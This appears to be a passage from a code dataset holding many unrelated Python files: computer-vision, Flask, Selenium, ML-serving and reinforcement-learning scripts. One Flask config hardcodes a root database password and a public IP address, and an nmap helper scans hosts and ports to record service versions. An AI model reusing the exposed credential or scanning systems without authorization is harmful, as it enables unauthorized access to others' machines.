weighted subproblem.\n\n        sp_init: None, array-like\n            (Optional) Subproblem initialization for the penalized variable.\n\n        sp_upv_init: None, array-like\n            (Optional) Subproblem initialization for the unpenalized variable.\n\n        other_data\n            (Optional) Subproblem initialization for other data e.g. dual variables.\n\n        Output\n        ------\n        solution, upv_solution, other_data\n        \"\"\"\n        raise NotImplementedError\n","sub_path":"yaglm/opt/lla.py","file_name":"lla.py","file_ext":"py","file_size_in_byte":7511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"519001038","text":"#%%\nimport os\nimport numpy as np\nimport cv2\nfrom matplotlib import pyplot as plt\n\n# img1 = cv2.imread('box.png',0) # queryImage\n# img2 = cv2.imread('box_in_scene.png',0) # trainImage\n\nData_Set_dir = (os.path.dirname(os.path.realpath(__file__)))\n\nimg1 = cv2.imread(os.path.join(Data_Set_dir,'box.png'))\nimg2 = cv2.imread(os.path.join(Data_Set_dir,'box_in.png'))\n\ngray = cv2.cvtColor(img1,cv2.COLOR_BGR2GRAY)\n\n#%%\n\n# Create a SIFT object.\n\nsift = cv2.xfeatures2d.SIFT_create()\n\n# Compute and extract the keypoints from the image.\n#cv2.SURF.detect(image[, mask]) → keypoints\nkp = sift.detect(gray,None)\n\n#%%\n\n# Draw the keypoints obtained above.\nimg_1 = cv2.drawKeypoints(gray, kp, img1)\nimg_2 = cv2.drawKeypoints(gray, kp, img2, flags=cv2.DRAW_MATCHES_FLAGS_DRAW_RICH_KEYPOINTS)\n\n#%%\n\nplt.imshow(img_1)\nplt.imshow(img_2)\n\n#%%\n# \n\nsift = cv2.xfeatures2d.SIFT_create()\n\n# find the keypoints and descriptors with SIFT\nkp1, des1 = sift.detectAndCompute(img1,None)\nkp2, des2 = sift.detectAndCompute(img2,None)\n\n#%%\n# FLANN parameters\nFLANN_INDEX_KDTREE = 0\nindex_params = dict(algorithm = FLANN_INDEX_KDTREE, trees = 5)\nsearch_params = dict(checks=50)   # or pass empty dictionary\n\nflann = cv2.FlannBasedMatcher(index_params,search_params)\n\nmatches = flann.knnMatch(des1,des2,k=2)\n\n#%%\n# Need to draw only good matches, so create a mask\nmatchesMask = [[0,0] for i in range(len(matches))]\n\n#%%\n# ratio test as per Lowe's paper\nfor i,(m,n) in enumerate(matches):\n    if m.distance < 0.7*n.distance:\n        matchesMask[i]=[1,0]\n\ndraw_params = dict(matchColor = (0,255,0),\n                   singlePointColor = (255,0,0),\n                   matchesMask = matchesMask,\n                   flags = 0)\n\n#%%\nimg3 = cv2.drawMatchesKnn(img1,kp1,img2,kp2,matches,None,**draw_params)\n\n#%%\nplt.imshow(img3,),plt.show()\n\n# %%\n","sub_path":"SIFT_b.py","file_name":"SIFT_b.py","file_ext":"py","file_size_in_byte":1832,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"123975729","text":"# file_search.py 11Aug2021 crs, from read_file_try.py\r\n\r\n\"\"\"\r\nSimple file search/scan similar to simple UNIX/Linux grep\r\n 1. 
Loop over files/strings\r\n\"\"\"\r\nprev_name = \"REQUIRED\"\r\nprev_search_string = \"REQUIRED\"\r\nwhile True:\r\n    file_name = input(f\"Enter File Name [{prev_name}]:\")\r\n    if file_name == \"\":\r\n        file_name = prev_name\r\n    if file_name == \"REQUIRED\":\r\n        continue        # Try again\r\n    \r\n    prev_name = file_name       # Remember as default\r\n    search_string = input(f\"Enter search string[{prev_search_string}]:\")\r\n    if search_string == \"\":\r\n        search_string = prev_search_string\r\n    if search_string == \"REQUIRED\":     # What if we want to search\r\n                                        # for \"REQUIRED\" ?\r\n        continue    # Ignore the REQUIRED placeholder\r\n    prev_search_string = search_string\r\n    \r\n    try:\r\n        with open(file_name) as finp:\r\n            for lineno, line in enumerate(finp, start=1):\r\n                if line.find(search_string) > -1:\r\n                    print(f\"{lineno:3}: {line}\", end=\"\")\r\n    except IOError as e:\r\n        print(f\"Something wrong happened in file {file_name} {e}\")\r\n\r\nr'''\r\n= RESTART: C:/Users/raysm/workspace/python/\r\nIntroductionToProgramming/presentation/Class_5_Files\r\n/homework/solutions/file_search.py\r\nEnter File Name [REQUIRED]:file_search.py\r\nEnter search string[REQUIRED]:while\r\n  9: while True:\r\nEnter File Name [file_search.py]:\r\nEnter search string[while]:if\r\n 11:     if file_name == \"\":\r\n 13:     if file_name == \"REQUIRED\":\r\n 18:     if search_string == \"\":\r\n 20:     if search_string == \"REQUIRED\":     # What if we want to search\r\n 28:                 if line.find(search_string) > -1:\r\nEnter File Name [file_search.py]:../../../../exercises/files/read_file_try.py\r\nEnter search string[if]:try\r\n  1: # read_file_try.py 15Oct2018\r\n  4:     with try/except to catch and report errors\r\n  8: try:\r\nEnter File Name [../../../../exercises/files/read_file_try.py]:\r\n\r\n'''\r\n","sub_path":"presentation/Class_7_Graphics/homework/solutions/file_search.py","file_name":"file_search.py","file_ext":"py","file_size_in_byte":1972,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"462392375","text":"'''Stores common objects for api.'''\nimport os\nfrom flask import Flask\nfrom persistence import trips_models\n\ndef create_flask_app():\n    '''Creates a configured flask app.'''\n    app = Flask(__name__, template_folder='templates')\n    app.debug = True\n    app.secret_key = 'secret'\n    app.config['DEBUG'] = True\n    app.config['SQLALCHEMY_DATABASE_URI'] = _get_db_url()\n    app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\n    trips_models.db.init_app(app)\n\n    return app\n\n\ndef _get_db_url():\n    if (os.getenv('SERVER_SOFTWARE') and\n            os.getenv('SERVER_SOFTWARE').startswith('Google App Engine/')):\n        return 'mysql+gaerdbms:///prod?instance=trekafe:live'\n    else:\n        #return 'mysql://webapp:webapp@localhost/trekafe'\n        return 'mysql://root:Qwerty@1@173.194.243.251/prod'\n","sub_path":"api/app_utils.py","file_name":"app_utils.py","file_ext":"py","file_size_in_byte":765,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"259353019","text":"import time\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\ndriver = webdriver.Chrome(executable_path=\"/home/kiran/Downloads/Selenium/chromedriver/chromedriver\")\ndriver.get(\"http://www.google.com/\")\ndriver.implicitly_wait(5)\nprint(driver.title)\ndriver.find_element(By.NAME, \"q\").send_keys(\"naveen automationlabs\")\ntime.sleep(5)\n\noptionslist = driver.find_elements(By.CSS_SELECTOR, \"ul.erkvQe li span\")\n# for id we can use a css selector like #username --> By.CSS_SELECTOR, \"#username\"\n# 
for class we can use a css selector via .(dot)class_name (pick a unique class if the element has several)\n# for an element with many classes use a css selector like tag_name.class1.class2.class3\n# for link text we can use an xpath like //a[text()=\"Click Here\"]\n# for going parent to child use XPath, e.g. //div[@id=\"sfi\"]/label; another example: //form/div[@id=\"sdi\"]/div[1]/label\n# for going parent to child use CSS SELECTOR div[id=\"dufn\"] label\nfor data in optionslist:\n    print(data.text)\n    if data.text == 'naveen automationlabs youtube':\n        data.click()\n        break\n\ntime.sleep(5)\ndriver.quit()\n\n\n","sub_path":"NaveenAutomation/Webdriverbasics.py","file_name":"Webdriverbasics.py","file_ext":"py","file_size_in_byte":1096,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"97116555","text":"\"\"\"A document represents the state of an editing document.\"\"\"\nfrom .selection import Selection, Interval\nfrom .event import Event\nfrom . import commands\nfrom .userinterface import UserInterface\nfrom . import pointer\nfrom .navigation import center_around_selection\n\nimport logging\n\ndocumentlist = []\nactivedocument = None\n\n\nclass Document():\n\n    \"\"\"Contains all objects of one file editing document\"\"\"\n    OnDocumentInit = Event()\n    create_userinterface = None\n    _text = ''\n    saved = True\n    mode = None\n\n    expandtab = False\n    tabwidth = 4\n    autoindent = True\n\n    locked_selection = None\n\n    def __init__(self, filename=\"\"):\n        documentlist.append(self)\n        self.OnTextChanged = Event()\n        self.OnRead = Event()\n        self.OnWrite = Event()\n        self.OnQuit = Event()\n        self.OnActivate = Event()\n        self.OnPrompt = Event()\n\n        self.filename = filename\n\n        self._selection = Selection(Interval(0, 0))\n        self.selectmode = ''\n\n        if not self.create_userinterface:\n            raise Exception('No function specified in Document.create_userinterface.')\n        self.ui = self.create_userinterface(self)\n        if not isinstance(self.ui, UserInterface):\n            raise Exception('document.ui not an instance of UserInterface.')\n\n        # Load the default key map\n        from .keymap import default\n        self.keymap = {}\n        self.keymap.update(default)\n\n        self.OnDocumentInit.fire(self)\n\n        if filename:\n            commands.load(self)\n\n    def quit(self):\n        \"\"\"Quit document.\"\"\"\n        logging.info('Quitting document ' + str(self))\n        self.OnQuit.fire(self)\n        global activedocument\n        index = documentlist.index(self)\n\n        # debug(str(documentlist))\n        #debug(\"self: \" + str(self.document))\n        #debug(\"index: \" + str(index))\n        # self.getkey()\n\n        if len(documentlist) == 1:\n            print('fate - document: close the last document by setting activedoc to None')\n            activedocument = None\n            return\n\n        if index < len(documentlist) - 1:\n            nextdocument = documentlist[index + 1]\n        else:\n            nextdocument = documentlist[index - 1]\n\n        nextdocument.activate()\n        documentlist.remove(self)\n\n    @property\n    def text(self):\n        return self._text\n\n    @text.setter\n    def text(self, value):\n        self._text = value\n\n        self.saved = False\n        self.OnTextChanged.fire(self)\n\n    def activate(self):\n        \"\"\"Activate this document.\"\"\"\n        global activedocument\n        activedocument = self\n        self.OnActivate.fire(self)\n\n    @property\n    def selection(self):\n        return self._selection\n\n    @selection.setter\n    def selection(self, value):\n        # Make sure only valid selections are applied\n        assert isinstance(value, Selection)\n        value.validate(self)\n        self._selection = value\n\n        # Update the userinterface viewport to center around first interval\n        center_around_selection(self)\n\n    def processinput(self, 
userinput):\n \"\"\"This method is called when this document receives userinput.\"\"\"\n # If the cancel key has been pressed, convert input to Cancel\n if userinput == self.cancelkey:\n userinput = 'Cancel'\n\n logging.debug('Input: ' + str(userinput))\n\n if self.mode:\n # We are not in normalmode\n self.mode.processinput(self, userinput)\n else:\n # We are in normalmode\n if isinstance(userinput, pointer.PointerInput):\n self.process_pointerinput(userinput)\n else:\n if type(userinput) == str:\n key = userinput\n if key in self.keymap:\n command = self.keymap[key]\n else:\n command = None\n else:\n command = userinput\n\n while callable(command):\n command = command(self)\n\n def process_pointerinput(self, userinput):\n assert isinstance(userinput, pointer.PointerInput)\n\n if userinput.length:\n logging.debug('You sweeped from position {} till {}'\n .format(userinput.pos, userinput.pos + userinput.length))\n else:\n logging.debug('You clicked at position ' + str(userinput.pos))\n\n\ndef next_document(document):\n \"\"\"Go to the next document.\"\"\"\n index = documentlist.index(document)\n ndocument = documentlist[(index + 1) % len(documentlist)]\n ndocument.activate()\ncommands.next_document = next_document\n\n\ndef previous_document(document):\n \"\"\"Go to the previous document.\"\"\"\n index = documentlist.index(document)\n ndocument = documentlist[(index - 1) % len(documentlist)]\n ndocument.activate()\ncommands.previous_document = previous_document\n\n\ndef goto_document(index):\n \"\"\"Command constructor to go to the document at given index.\"\"\"\n def wrapper(document):\n documentlist[index].activate()\n return wrapper\n","sub_path":"fate/document.py","file_name":"document.py","file_ext":"py","file_size_in_byte":5061,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"195468895","text":"import nmap\n\ndef runScan(ipAddr, portRange, scanVariables):\n results = {}\n\n\n ps = nmap.PortScanner()\n ps.scan(ipAddr, portRange, scanVariables)\n\n hosts = ps.all_hosts()\n for host in hosts:\n ports = []\n currentHost = ps[host]\n hostState = currentHost.state()\n protocols = currentHost.all_protocols()\n if 'tcp' in protocols:\n tcpPorts = currentHost.all_tcp()\n for port in tcpPorts:\n info = currentHost.tcp(port)\n portState = info['state']\n portProtocol = info['name']\n portProduct = info['product']\n productVersion = info['version']\n ports.append({'port': port, 'portInfo': {\n 'state': portState,\n 'protocol': portProtocol,\n 'productVersion': portProduct,\n }})\n\n results[host] = ports\n\n return results\n","sub_path":"Recon/nmapScanner.py","file_name":"nmapScanner.py","file_ext":"py","file_size_in_byte":980,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"601003728","text":"import unittest\nfrom TestUtils import TestChecker\nfrom AST import *\n\nclass CheckSuite(unittest.TestCase):\n def test_400_simple_decl_function(self):\n input = \"\"\"int main() {}\n int main(){}\"\"\"\n expect = \"Redeclared Function: main\"\n self.assertTrue(TestChecker.test(input,expect,400))\n def test_401_simple_decl_function(self):\n input = \"\"\"boolean b;\n int main() {}\n \"\"\"\n expect = \"\"\n self.assertTrue(TestChecker.test(input,expect,401))\n\n ","sub_path":"test/CheckSuite.py","file_name":"CheckSuite.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"512447667","text":"import 
os\nimport numpy as np\nimport xgboost as xgb\n\n_MODEL_PATH = os.path.join('/opt/ml/', 'model') # Path where all your model(s) live in\n\nclass ModelService(object):\n model = None\n\n @classmethod\n def get_model(cls):\n \"\"\"Get the model object for this instance, loading it if it's not already loaded.\"\"\"\n if cls.model is None:\n cls.model = xgb.Booster({'nthread': 4})\n cls.model.load_model(os.path.join(_MODEL_PATH, 'model.joblib'))\n print('Model loaded')\n return cls.model\n\n @classmethod\n def predict(cls, input):\n \"\"\"For the input, do the predictions and return them.\"\"\"\n clf = cls.get_model()\n return clf.predict(input)\n\n\ndef predict(json_input):\n \"\"\"\n Prediction given the request input\n :param json_input: [dict], request input\n :return: [dict], prediction\n \"\"\"\n data = json_input['features']\n print(data)\n data = np.array(data)\n data = xgb.DMatrix(data)\n prediction = ModelService.predict(data)\n print(prediction)\n return {\n \"prediction\": prediction.tolist()\n }\n","sub_path":"sdkv2/ch8/sagify/src/sagify_base/prediction/prediction.py","file_name":"prediction.py","file_ext":"py","file_size_in_byte":1104,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"536521003","text":"from flask import Blueprint, jsonify, request\nfrom flask_expects_json import expects_json\nfrom application.custom_logger import log_put_delete_requests, log_post_requests\nfrom application.logic.animal_logic import add_animal, get_all_animals_for_center, update_animal, \\\n delete_animal, get_animal\nfrom application.schemas import post_animal_schema, put_animal_schema\nfrom application.authentification.auth_logic import token_required\n\nanimals = Blueprint('animals', __name__)\n\n\n@animals.route('/animals', methods=['GET'])\n@token_required\ndef get_animals(_center_id):\n # get all the animals related to the center\n\n return jsonify({'animals': get_all_animals_for_center(_center_id)})\n\n\n\n@animals.route('/animals', methods=['POST'])\n@token_required\n@expects_json(post_animal_schema)\ndef post_animal(_center_id):\n # post an animal to the current center animals list\n\n request_data = request.get_json()\n response = add_animal(_center_id, request_data['name'],\n request_data['age'],\n request_data['specie'])\n if response.status_code == 201:\n log_post_requests(request.method, request.url, _center_id,\n request.path, response.json['id'])\n return response\n\n\n@animals.route('/animals/', methods=['GET', 'DELETE'])\n@token_required\ndef get_or_delete_animal(_center_id, animal_id):\n # either get or delete provided animal id\n\n if request.method == 'DELETE':\n response = delete_animal(_center_id, animal_id)\n if response.status_code == 200:\n log_put_delete_requests(request.method, request.url, _center_id, request.path)\n return response\n\n return get_animal(_center_id, animal_id)\n\n\n@animals.route('/animals/', methods=['PUT'])\n@token_required\n@expects_json(put_animal_schema)\ndef put_animal(_center_id, animal_id):\n # changing animal data\n\n request_data = request.get_json()\n new_animal_data = (animal_id, _center_id, request_data['name'], request_data['age'], request_data['specie'])\n response = update_animal(new_animal_data)\n if response.status_code == 200:\n log_put_delete_requests(request.method, request.url, _center_id, request.path)\n return 
response\n","sub_path":"application/routes/routes_animals.py","file_name":"routes_animals.py","file_ext":"py","file_size_in_byte":2249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"425952935","text":"# To add a new cell, type '# %%'\n# To add a new markdown cell, type '# %% [markdown]'\n# %%\nimport numpy as np\nimport random\nimport matplotlib.pyplot as plt\n\n# %% [markdown]\n# ## Plot Function\n\n# %%\ndef plot(values, policy, goalState, flag, fileName = None, title = None):\n cmap = plt.cm.Blues\n norm = plt.Normalize(np.min(values), np.max(values))\n rgba = cmap(norm(values))\n\n rgba[12, 48] = 1.0, 0.0, 0.0, 1.0\n\n for i in range(0, 25):\n for j in range(0, 50):\n if(not isValid(j, i)):\n rgba[i][j] = 0.0, 0.0, 0.0, 1.0\n\n fig, ax = plt.subplots(figsize=(15,15))\n im = ax.imshow(rgba, interpolation = 'nearest')\n ax.set_ylim(ax.get_ylim()[::-1])\n #print(np.min(values), np.max(values))\n\n if(flag):\n for i in range(0, 25):\n for j in range(0, 50):\n if(not isValid(j, i)):\n continue\n\n num = int(policy[i][j])\n text = ''\n if(num == 1): text = 'L'\n elif(num == 2): text = 'U'\n elif(num == 3): text = 'R'\n else: text = 'D'\n color = 'red'\n if(i == 12 and j == 48): color = 'black'\n text = ax.text(j, i, text, ha = 'center', va = 'center', color = 'black', size = 'small')\n\n plt.axis('on')\n\n for i in range(1, 26, 1):\n ax.axhline(i - 0.5, color = 'gray', linewidth = 0.4)\n \n for i in range(1, 51, 1):\n ax.axvline(i - 0.5, color = 'gray', linewidth = 0.4)\n\n if(title): ax.set_title(title)\n\n if(fileName):\n plt.savefig(fileName)\n plt.close()\n \n plt.show()\n\n# %% [markdown]\n# ## Part a - Value Iteration \n# #### → Intial values for all possible states is 0\n# #### → Action 1 means left, Action 2 means up, Aciton 3 means right, Action 4 means down\n# %% [markdown]\n# #### This function determines if the state is valid or a wall\n\n# %%\ndef isValid(i, j):\n if(i == 0 or j == 0 or i == 49 or j == 24): return False\n if(i == 25 or i == 26):\n if(j <= 11 or j >= 13): return False\n return True\n\n# %% [markdown]\n# #### This function gets the reward given a state and an action \n\n# %%\ndef reward(i, j, action, values, goalState, gamma, step):\n\n ans = 0\n\n if(action == 1):\n ans += 0.8 * rewardHelper(i - 1, j, values, gamma, step, goalState, i, j)\n ans += (0.2 / 3) * rewardHelper(i , j + 1, values, gamma, step, goalState, i, j)\n ans += (0.2 / 3) * rewardHelper(i + 1, j, values, gamma, step, goalState, i, j)\n ans += (0.2 / 3) * rewardHelper(i , j - 1, values, gamma, step, goalState, i, j)\n if(action == 2):\n ans += (0.2 / 3) * rewardHelper(i - 1, j, values, gamma, step, goalState, i, j)\n ans += 0.8 * rewardHelper(i , j + 1, values, gamma, step, goalState, i, j)\n ans += (0.2 / 3) * rewardHelper(i + 1, j, values, gamma, step, goalState, i, j)\n ans += (0.2 / 3) * rewardHelper(i , j - 1, values, gamma, step, goalState, i, j)\n if(action == 3):\n ans += (0.2 / 3) * rewardHelper(i - 1, j, values, gamma, step, goalState, i, j)\n ans += (0.2 / 3) * rewardHelper(i , j + 1, values, gamma, step, goalState, i, j)\n ans += 0.8 * rewardHelper(i + 1, j, values, gamma, step, goalState, i, j)\n ans += (0.2 / 3) * rewardHelper(i , j - 1, values, gamma, step, goalState, i, j)\n if(action == 4):\n ans += (0.2 / 3) * rewardHelper(i - 1, j, values, gamma, step, goalState, i, j)\n ans += (0.2 / 3) * rewardHelper(i , j + 1, values, gamma, step, goalState, i, j)\n ans += (0.2 / 3) * rewardHelper(i + 1, j, values, gamma, step, 
goalState, i, j)\n ans += 0.8 * rewardHelper(i , j - 1, values, gamma, step, goalState, i, j)\n return ans\n\n\n# %%\ndef rewardHelper(i, j, values, gamma, step, goalState, posX, posY):\n x = goalState[0]\n y = goalState[1]\n ans = 0\n if(i == x and j == y):\n ans += 100\n if(not isValid(i, j)): \n \n if(posX == x and posY == y): \n ans += 100\n ans += gamma * values[posX][posY][step - 1]\n else:\n ans -= 1\n ans += gamma * values[posX][posY][step - 1]\n \n else: ans += gamma * values[i][j][step - 1]\n\n return ans\n\n\n# %%\ndef valueIteration(gamma, theta, goalState, values, policies, maxNorm, toConverge):\n\n for step in range(1, values.shape[2]):\n\n change = -1\n\n for i in range(0, 50):\n for j in range(0, 25):\n #Check if this is a wall or not\n if(not isValid(i, j)): continue #Is a wall\n \n maxValue = -np.Inf\n actionTaken = 0\n #Taking max after considering every action as intended action\n for action in range(1, 5):\n curr = reward(i, j, action, values, goalState, gamma, step) # expected reward using this action as the intended action\n #print('reward for action', action, 'at step', step, 'for state', i, j, 'is', curr)\n if(curr > maxValue):\n maxValue = curr\n actionTaken = action\n #if(step == 4):\n #print('changing action for state ', i, j, 'new max value', maxValue, 'new action', actionTaken)\n \n values[i][j][step] = maxValue\n\n #print('values at step ', step, i, j, maxValue)\n change = max(abs(maxValue - values[i][j][step - 1]), change) #calculate the change\n\n policies[i][j][step - 1] = actionTaken\n\n #print('maxNorm at step', step, 'is', change)\n if(change < theta and toConverge): \n #print('converged at step', step, 'max change', change)\n break # converged\n maxNorm[step - 1] = change\n \n return values, policies\n\n# %% [markdown]\n# #### Run the function for the values given in the assignment\n\n# %%\niter = 100 #max iterations if not converging\nvalues = np.zeros((50, 25, iter + 1))\npolicies = np.zeros((50, 25, iter))\nmaxNorm = np.zeros((iter))\n\nvalues, policies = valueIteration(0.1, 0.1, (48, 12), values, policies, maxNorm, False)\n\nmat1 = np.zeros((25, 50))\nmat2 = np.zeros((25, 50))\n\nfor i in range(0, 50):\n for j in range(0, 25):\n mat1[j][i] = values[i][j][4]\n mat2[j][i] = policies[i][j][3]\n\nplot(mat1, mat2, (48, 12), True, None, 'Anything')\n#for step in range(0, iter + 1):\n# for i in range(0, 50):\n# for j in range(0, 25):\n# print('values at step ', step, i, j, values[i][j][step])\n \n\n#print(values.shape)\n#plot(values[:][:][iter], policies[:][:][iter - 1], (48, 12))\n#np.set_printoptions(threshold=np.inf)\n\n# %% [markdown]\n# ## Part b - Plot the value function at different iterations\n\n# %%\niter = 1000 #max iterations if not converging\nvaluesNew = np.zeros((50, 25, iter + 1))\npoliciesNew = np.zeros((50, 25, iter))\nmaxNormNew = np.zeros((iter))\n\nvaluesNew, policiesNew = valueIteration(0.99, 0.1, (48, 12), valuesNew, policiesNew, maxNormNew, True)\n\nreqIteration = np.array([20, 50, 100])\n\nfor x in reqIteration:\n mat1 = np.zeros((25, 50))\n mat2 = np.zeros((25, 50))\n\n for i in range(0, 50):\n for j in range(0, 25):\n mat1[j][i] = valuesNew[i][j][x]\n mat2[j][i] = policiesNew[i][j][x - 1]\n\n plot(mat1, mat2, (48, 12), True)\n\n# %% [markdown]\n# ## Part c - Sample execution using the policy\n# %% [markdown]\n# #### Function to move the agent based on the intended action\n\n# %%\ndef move(currState, action):\n num = random.uniform(0.0, 1.0)\n newStateX = -5\n newStateY = -5\n\n if(action == 1):\n if(num <= 0.8): newStateX = 
currState[0] - 1\n elif(num <= 0.8 + 0.2 / 3): newStateY = currState[1] + 1\n elif(num <= 1.0 - 0.2 / 3): newStateX = currState[0] + 1\n else: newStateY = currState[1] - 1\n if(action == 2):\n if(num <= 0.8): newStateY = currState[1] + 1\n elif(num <= 0.8 + 0.2 / 3): newStateX = currState[0] - 1\n elif(num <= 1.0 - 0.2 / 3): newStateX = currState[0] + 1\n else: newStateY = currState[1] - 1\n if(action == 3):\n if(num <= 0.8): newStateX = currState[0] + 1\n elif(num <= 0.8 + 0.2 / 3): newStateY = currState[1] + 1\n elif(num <= 1.0 - 0.2 / 3): newStateX = currState[0] - 1\n else: newStateY = currState[1] - 1\n if(action == 4):\n if(num <= 0.8): newStateY = currState[1] - 1\n elif(num <= 0.8 + 0.2 / 3): newStateY = currState[1] + 1\n elif(num <= 1.0 - 0.2 / 3): newStateX = currState[0] + 1\n else: newStateX = currState[0] - 1\n \n if(newStateX == -5): newStateX = currState[0]\n if(newStateY == -5): newStateY = currState[1]\n\n if(not isValid(newStateX, newStateY)): return currState\n else: return (newStateX, newStateY)\n\n# %% [markdown]\n# #### Move the agent and get the counts for each state visitation\n\n# %%\npolicy = np.zeros((50, 25))\n#policy = policiesNew[:][:][policiesNew.shape[2] - 1].copy()\nfor i in range(0, 50):\n for j in range(0, 25):\n policy[i][j] = policiesNew[i][j][661]\n\nfor episode in range(0, 200):\n count = np.zeros((50, 25))\n currStateX = 1\n currStateY = 1\n\n for step in range(0, 1000):\n newState = move((currStateX, currStateY), policy[currStateX][currStateY])\n count[newState[0]][newState[1]] += 1\n currStateX = newState[0]\n currStateY = newState[1]\n if(currStateX == 48 and currStateY == 12): break\n\n mat1 = np.zeros((25, 50))\n\n for i in range(0, 50):\n for j in range(0, 25):\n mat1[j][i] = count[i][j]\n\n plot(mat1, None, (48, 12), False)\n\n# %% [markdown]\n# ## Part d - Policy convergence\n\n# %%\nstopNew = 0\nstopD = 0\n\niter = 100 #max iterations if not converging\nvaluesD = np.zeros((50, 25, iter + 1))\npoliciesD = np.zeros((50, 25, iter))\nmaxNormD = np.zeros((iter))\n\nvaluesD, policiesD = valueIteration(0.01, 0.1, (48, 12), valuesD, policiesD, maxNormD, False)\n\nfor step in range(1, policiesD.shape[2]):\n \n flag = False\n\n for i in range(0, 50):\n for j in range(0, 25):\n if(not isValid(i, j)): continue\n if(policiesD[i][j][step] != policiesD[i][j][99]):\n flag = True\n break\n \n if(flag): break\n if(not flag): \n stopD = step\n break\n\nfor step in range(1, policiesNew.shape[2]):\n \n flag = False\n for i in range(0, 50):\n for j in range(0, 25):\n if(not isValid(i, j)): continue\n #print('step is', step, 'state is', i, j, 'curr', policiesNew[i][j][step], 'last', policiesNew[i][j][step - 1])\n if(policiesNew[i][j][step] != policiesNew[i][j][661]):\n flag = True\n break\n if(flag): break\n\n if(not flag): \n stopNew = step\n break\n\nprint('Policy converges at step', stopD, 'for gamma = 0.01')\nprint('Policy converges at step', stopNew, 'for gamma = 0.99')\n\nplt.plot(maxNormNew)\nplt.plot(maxNormD)\n\n\n","sub_path":"A2-PartA-2018EE10435-2018EE10443.py","file_name":"A2-PartA-2018EE10435-2018EE10443.py","file_ext":"py","file_size_in_byte":11010,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"220586394","text":"import requests\nimport pandas as pd\nimport funcs_DB\nfrom typing import Dict, Tuple,List\n\nclass Requester:\n \n url='https://api.adsabs.harvard.edu/v1/search/query'\n fields=['title','author','aff','keyword','citation_count','pubdate','author_count','page_count','bibstem']\n \n 
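# hypothetical usage sketch -- the token, DB name and query terms below are illustrative only:\n    #   req = Requester('MY_ADS_TOKEN', 'ads_results')\n    #   req.setParams(('title:exoplanet', 'year:2020'), maxRows=4000)\n    #   req.loadData()\n    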
def __init__(self, token: str, requestName: str):\n        self.token = token\n        self.headers = {'Authorization': 'Bearer '+token}\n        self.db=requestName\n        \n    def setParams(self,searchCriteria: Tuple,maxRows: int=None):\n        self.searchCriteria=searchCriteria\n        self.maxRows=maxRows\n        self.params=[('fq',q) for q in self.searchCriteria]\n        self.params[0]=('q',self.params[0][1])\n        self.flags=[('fl',','.join(self.fields))]\n        if self.maxRows:\n            self.rows=[('rows',str(int(self.maxRows)))]\n        else:\n            self.rows=[('rows',str(int(2000)))]\n        self.params=tuple(self.params+self.flags+self.rows)\n        return\n    \n    def setParamsForRequest(self,startRow: int):\n        params = self.params+(('start', str(startRow)),)\n        return params\n    \n    def loadData(self):\n        db=funcs_DB.requestDB(self.db)\n        startRow=0\n        while True:\n            params=self.setParamsForRequest(startRow)\n            self.response = requests.get(self.url, headers=self.headers, params=params)\n            docs = self.response.json()['response']['docs']\n            # map() is lazy in Python 3, so iterate explicitly to actually store the records\n            for doc in docs:\n                db.addRecords(doc)\n            startRow+=len(docs)\n\n            if len(docs)!=2000:\n                break\n        return","sub_path":"AdsAbsRequester.py","file_name":"AdsAbsRequester.py","file_ext":"py","file_size_in_byte":1598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"312868811","text":"import json\nimport webapp2\nimport time\n\nimport model\n\n\ndef AsDict(sample):\n    return {'id': sample.key.id(), 'name': sample.name, 'description': sample.description, 'concentration': sample.concentration}\n\n\nclass RestHandler(webapp2.RequestHandler):\n\n    def dispatch(self):\n        time.sleep(1)\n        super(RestHandler, self).dispatch()\n\n\n    def SendJson(self, r):\n        self.response.headers['content-type'] = 'text/plain'\n        self.response.write(json.dumps(r))\n    \n\nclass QueryHandler(RestHandler):\n\n    def get(self):\n        samples = model.AllSamples()\n        r = [ AsDict(sample) for sample in samples ]\n        self.SendJson(r)\n\n\nclass UpdateHandler(RestHandler):\n\n    def post(self):\n        r = json.loads(self.request.body)\n        sample = model.UpdateSample(r['id'], r['name'], r['description'], r['concentration'])\n        r = AsDict(sample)\n        self.SendJson(r)\n\n\nclass InsertHandler(RestHandler):\n\n    def post(self):\n        r = json.loads(self.request.body)\n        sample = model.InsertSample(r['name'], r['description'], r['concentration'])\n        r = AsDict(sample)\n        self.SendJson(r)\n\n\nclass DeleteHandler(RestHandler):\n\n    def post(self):\n        r = json.loads(self.request.body)\n        model.DeleteSample(r['id'])\n\n\nAPP = webapp2.WSGIApplication([\n    ('/rest/query', QueryHandler),\n    ('/rest/insert', InsertHandler),\n    ('/rest/delete', DeleteHandler),\n    ('/rest/update', UpdateHandler),\n], debug=True)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"245510557","text":"# --------------------------------------------------------\n# Tensorflow Faster R-CNN\n# Licensed under The MIT License [see LICENSE for details]\n# Written by Xinlei Chen\n# --------------------------------------------------------\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport tensorflow as tf\nimport tensorflow.contrib.slim as slim\nfrom tensorflow.contrib.slim import losses\nfrom tensorflow.contrib.slim import arg_scope\nimport numpy as np\n\nfrom 